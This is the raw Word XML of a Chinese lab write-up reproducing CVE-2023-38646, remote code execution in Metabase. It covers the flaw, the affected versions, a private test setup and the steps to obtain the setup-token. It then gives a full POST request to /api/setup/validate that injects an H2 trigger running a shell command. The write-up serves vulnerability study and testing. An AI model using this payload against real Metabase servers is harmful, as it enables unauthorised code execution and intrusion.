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3F487" w14:textId="77777777" w:rsidR="0078712B" w:rsidRDefault="0078712B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4488AD88" w14:textId="77777777" w:rsidR="0078712B" w:rsidRDefault="0078712B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A760B54" w14:textId="77777777" w:rsidR="0078712B" w:rsidRDefault="0078712B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7668AF76" w14:textId="77777777" w:rsidR="00DA5227" w:rsidRDefault="00DA5227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r w:rsidRPr="00DA5227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>CVE-2023-38646</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA5227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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5CF2D7" w14:textId="77777777" w:rsidR="00DA5227" w:rsidRDefault="00DA5227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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA5227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>Metabase</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA5227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 xml:space="preserve"> H2 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E3E004" w14:textId="7139BEE3" w:rsidR="0078712B" w:rsidRDefault="00DA5227">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA5227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>远程代码执行漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3815E5BA" w14:textId="77777777" w:rsidR="0078712B" w:rsidRDefault="0078712B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B1AD61B" w14:textId="77777777" w:rsidR="0078712B" w:rsidRDefault="006C2EA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="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:id w:val="147465128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szCs w:val="44"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="0F9492DE" w14:textId="77777777" w:rsidR="0078712B" w:rsidRDefault="006C2EAA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51D305F2" w14:textId="37BFD25A" w:rsidR="0078712B" w:rsidRDefault="006C2EAA">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
            <w:rPr>
              <w:noProof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TOC \o "1-3" \h \u </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:sz w:val="44"/>
              <w:szCs w:val="44"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc27475" w:history="1"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漏洞描述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_Toc27475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A5227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797F0B4" w14:textId="380A94BC" w:rsidR="0078712B" w:rsidRDefault="00FD0FEA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5949" w:history="1">
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">2. </w:t>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>影响版本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_Toc25949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DA5227">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0AF9F06D" w14:textId="42CFF8CA" w:rsidR="0078712B" w:rsidRDefault="00FD0FEA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5232" w:history="1">
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">3. </w:t>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>环境部署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_Toc5232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DA5227">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="31894091" w14:textId="6BC105C4" w:rsidR="0078712B" w:rsidRDefault="00FD0FEA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1219" w:history="1">
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">4. </w:t>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>漏洞复现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_Toc11219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DA5227">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="006C2EAA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="797ED2A3" w14:textId="77777777" w:rsidR="0078712B" w:rsidRDefault="006C2EAA">
          <w:pPr>
            <w:rPr>
              <w:sz w:val="44"/>
              <w:szCs w:val="44"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:szCs w:val="44"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="1163C0DC" w14:textId="77777777" w:rsidR="0078712B" w:rsidRDefault="006C2EAA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEA8553" w14:textId="77777777" w:rsidR="0078712B" w:rsidRDefault="0078712B"/>
    <w:p w14:paraId="52098CFB" w14:textId="3F0D8041" w:rsidR="0078712B" w:rsidRDefault="006C2EAA">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc27475"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞描述</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="014C0AEB" w14:textId="5F019007" w:rsidR="004C1793" w:rsidRPr="004C1793" w:rsidRDefault="002E22F7" w:rsidP="00A00FDD">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="640"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋"/>
          <w:bCs/>
          <w:kern w:val="44"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc25949"/>
      <w:proofErr w:type="spellStart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Metabase</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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是一个开源的数据分析和可视化工具，它可以帮助用户轻松地连接到各种数据源，包括数据库、</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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云服务</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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和API，然后使用直观的界面进行数据查询、分析和可视化。CVE-2023-</w:t>
      </w:r>
      <w:r w:rsidR="00DA5227" w:rsidRPr="00DA5227">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DA5227" w:rsidRPr="00DA5227">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋"/>
          <w:bCs/>
          <w:kern w:val="44"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>38646</w:t>
      </w:r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 xml:space="preserve"> 中，由于</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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metabase</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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中存在 h2 数据库连接配置，且过滤不严格，攻击者可构造恶意请求触发h2 JDBC 命令执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52041AA6" w14:textId="1546D2AE" w:rsidR="0078712B" w:rsidRPr="004C1793" w:rsidRDefault="006C2EAA" w:rsidP="004C1793">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>影响版本</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="352232BF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open source &gt;= 0.46.6.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C019835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Enterprise &gt;= 1.46.6.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64392CC0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open source &gt;= 0.45.4.3.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0076B991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Enterprise &gt;= 1.45.4.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B98DCC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open source &gt;= 0.44.7.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A81A5B4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Enterprise &gt;= 1.44.7.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABE9A1E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open source &gt;= 0.43.7.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563C553A" w14:textId="7D2B65C8" w:rsidR="003C6EF5" w:rsidRPr="004C1793" w:rsidRDefault="003C6EF5" w:rsidP="003C6EF5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24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Enterprise &gt;= 1.43.7.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027F2E2C" w14:textId="52057EB4" w:rsidR="0078712B" w:rsidRDefault="006C2EAA">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc5232"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境部署</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="641AF59F" w14:textId="3BD48ED2" w:rsidR="0078712B" w:rsidRDefault="006C2EAA">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="48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4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>靶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机：CentOs7，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:bookmarkStart w:id="3" w:name="_Hlk143203864"/>
      <w:r w:rsidR="00705A99" w:rsidRPr="00705A99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>192.168.88.114</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="794DB1F9" w14:textId="74178067" w:rsidR="0078712B" w:rsidRDefault="006C2EAA">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="48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Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>渗透机：</w:t>
      </w:r>
      <w:r w:rsidR="00705A99">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="00705A99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 11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，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：192.168.</w:t>
      </w:r>
      <w:r w:rsidR="00705A99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>88.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A5E847" w14:textId="7421BBD6" w:rsidR="00705A99" w:rsidRDefault="00705A9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4D2FF3C2" w14:textId="543D2D99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下载含有漏洞的软件脚本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0B2943" w14:textId="48DD8E5D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hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="000214ED">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>https://downloads.metabase.com/v0.46.6.3/metabase.jar</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7F188068" w14:textId="39FB6B70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7D55821F" w14:textId="4D3D9CEF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将软件上传至靶机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBA5CCF" w14:textId="5565EC2F" w:rsidR="0025100D" w:rsidRPr="0025100D" w:rsidRDefault="0025100D" w:rsidP="0025100D">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="560"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-IE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4222B9B7" wp14:editId="239BAE83">
            <wp:extent cx="4367283" cy="250842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302"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4394097" cy="252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EB19B" w14:textId="5197E175" w:rsidR="0025100D" w:rsidRDefault="00361277">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="48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输入：</w:t>
      </w:r>
      <w:r w:rsidRPr="00361277">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>java -jar metabase.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFC147F" w14:textId="6F346654" w:rsidR="0025100D" w:rsidRDefault="00A21148" w:rsidP="00A21148">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="left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运行程序，在浏览器输入网址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http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://</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21148">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A21148">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>192.168.88.114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:3000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开始配置相关信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C66DB9" w14:textId="6AA4609B" w:rsidR="00A21148" w:rsidRDefault="0006000C">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="56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F1B0BC0" wp14:editId="4E1A309C">
            <wp:extent cx="5274310" cy="3131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DDAA" w14:textId="3947CBB3" w:rsidR="0025100D" w:rsidRDefault="0006000C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5E631A" wp14:editId="608A1EDA">
            <wp:extent cx="5274310" cy="3131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0C79" w14:textId="1CCF32DD" w:rsidR="0025100D" w:rsidRDefault="0006000C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3DEF8FD" wp14:editId="6F7748A5">
            <wp:extent cx="5274310" cy="5126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8518" w14:textId="7FD373C8" w:rsidR="0025100D" w:rsidRDefault="0006000C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0DCD31" wp14:editId="77CE3A7F">
            <wp:extent cx="5274310" cy="66770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CA38" w14:textId="6490751C" w:rsidR="0025100D" w:rsidRDefault="0006000C">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="48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连接数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A43F54" w14:textId="31B1127F" w:rsidR="0025100D" w:rsidRPr="005B758B" w:rsidRDefault="00633A4A" w:rsidP="00DA5227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  <w:lang w:val="en-IE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="711F6275" wp14:editId="07D7376B">
            <wp:extent cx="5274310" cy="49485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AAC" w14:textId="77777777" w:rsidR="0025100D" w:rsidRDefault="0025100D" w:rsidP="005B758B">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="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</w:p>
    <w:p w14:paraId="34B18CCD" w14:textId="72D00DF8" w:rsidR="0078712B" w:rsidRDefault="006C2EAA">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc11219"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="1A736B51" w14:textId="280D725F" w:rsidR="0078712B" w:rsidRDefault="006C2EAA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【步骤一】</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E96CB9" w14:textId="1C433A3C" w:rsidR="005B758B" w:rsidRDefault="005B758B" w:rsidP="009B39E8">
      <w:pPr>
        <w:pStyle w:val="10"/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获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>setup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:r w:rsidR="009B39E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009B39E8" w:rsidRPr="009B39E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>df7b1678-f1d4-4e3d-bce3-47ce8813b1fd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64063AED" w14:textId="0C404AA0" w:rsidR="005B758B" w:rsidRDefault="005B758B" w:rsidP="005B758B">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0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97B96B9" wp14:editId="33691018">
            <wp:extent cx="4244454" cy="2532569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4212" cy="25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60D0" w14:textId="1200BF67" w:rsidR="0078712B" w:rsidRDefault="006C2EAA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【步骤二】</w:t>
      </w:r>
      <w:r w:rsidR="005B758B" w:rsidRPr="005B758B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
      <w:r w:rsidR="005B758B" w:rsidRPr="005B758B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>POC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758B" w14:paraId="0604CF16" w14:textId="77777777" w:rsidTr="005B758B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AA854C2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POST /</w:t>
            </w:r>
            <w:proofErr w:type="spell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api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/setup/validate HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36C869A6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Host: your-</w:t>
            </w:r>
            <w:proofErr w:type="spell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ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="4189D09C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Content-Type: application/json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F14B933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</w:p>
          <w:p w14:paraId="3911D323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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BDDB7FC" w14:textId="45C6142C" w:rsidR="005B758B" w:rsidRPr="005B758B" w:rsidRDefault="005B758B" w:rsidP="005B758B">
            <w:pPr>
              <w:pStyle w:val="10"/>
              <w:ind w:firstLine="560"/>
              <w:jc w:val="left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 xml:space="preserve">    "token": "</w:t>
            </w:r>
            <w:r w:rsidR="009B39E8" w:rsidRPr="009B39E8">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4D4D4D"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>df7b1678-f1d4-4e3d-bce3-47ce8813b1fd</w:t>
            </w:r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",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03E82953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"details":</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C86027B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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C1A24C4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is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_on_demand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false,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52014540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is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_full_sync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false,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15CA7E1F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is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_sample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false,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="145524E2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cache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_ttl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null,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2174BFBB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refingerprint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false,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16EC234E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auto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_run_queries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true,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C132DEA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"schedules":</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06D56E43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{},</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44F3A461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"details":</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51F6053D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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6633D37E" w14:textId="31AB6DA3" w:rsidR="005B758B" w:rsidRPr="005B758B" w:rsidRDefault="005B758B" w:rsidP="005B758B">
            <w:pPr>
              <w:pStyle w:val="10"/>
              <w:ind w:firstLine="560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 xml:space="preserve">            "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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db</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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": "</w:t>
            </w:r>
            <w:proofErr w:type="gramStart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zip:/app/metabase.jar!/</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd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 xml:space="preserve">sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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pwnshell</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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 xml:space="preserve"> BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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javascript</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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njava.lang.Runtime.getRuntime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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().exec('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touch /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>/114514</w:t>
            </w:r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')\n$$--=x",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D457CE9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    "</w:t>
            </w:r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advanced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-options": false,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DD5E551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  <w:lang w:val="en-IE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    "</w:t>
            </w:r>
            <w:proofErr w:type="spell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ssl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true</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31CB12D8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},</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="569EA7B5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"name": "test",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F94B049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lastRenderedPageBreak/>
              <w:t xml:space="preserve">        "engine": "h2"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="263B98B8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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26D9A111" w14:textId="575E8729" w:rsidR="005B758B" w:rsidRDefault="005B758B" w:rsidP="005B758B">
            <w:pPr>
              <w:pStyle w:val="10"/>
              <w:ind w:firstLineChars="0" w:firstLine="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}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="54AFF579" w14:textId="572C79D2" w:rsidR="005B758B" w:rsidRDefault="009B39E8" w:rsidP="00887D7E">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind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7275D6" wp14:editId="2270A9BD">
            <wp:extent cx="5274310" cy="1665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7F0" w14:textId="30053F1D" w:rsidR="00887D7E" w:rsidRDefault="009B39E8" w:rsidP="009B39E8">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>执行的命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6194B9" w14:textId="3E623288" w:rsidR="004C1793" w:rsidRDefault="004C1793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【步骤三】</w:t>
      </w:r>
      <w:r w:rsidR="005F1959">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>发送请求</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58395B0E" w14:textId="578C4255" w:rsidR="005F1959" w:rsidRDefault="005F1959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81562F5" wp14:editId="06DC96A7">
            <wp:extent cx="5274310" cy="8559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A387" w14:textId="6CAE2162" w:rsidR="005F1959" w:rsidRDefault="00BC4C3E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43A90E" wp14:editId="39D5DAEB">
            <wp:extent cx="5274310" cy="20840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A8DE" w14:textId="00221633" w:rsidR="005F1959" w:rsidRDefault="00BC4C3E" w:rsidP="004C1793">
      <w:pPr>
        <w:pStyle w:val="10"/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命令执行成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387A3BCA" w14:textId="36BA5D32" w:rsidR="004C1793" w:rsidRDefault="004C1793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【步骤四】</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269629A0" w14:textId="25AD2D21" w:rsidR="00BC4C3E" w:rsidRDefault="00BC4C3E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脚本测试</w:t>
      </w:r>
    </w:p>
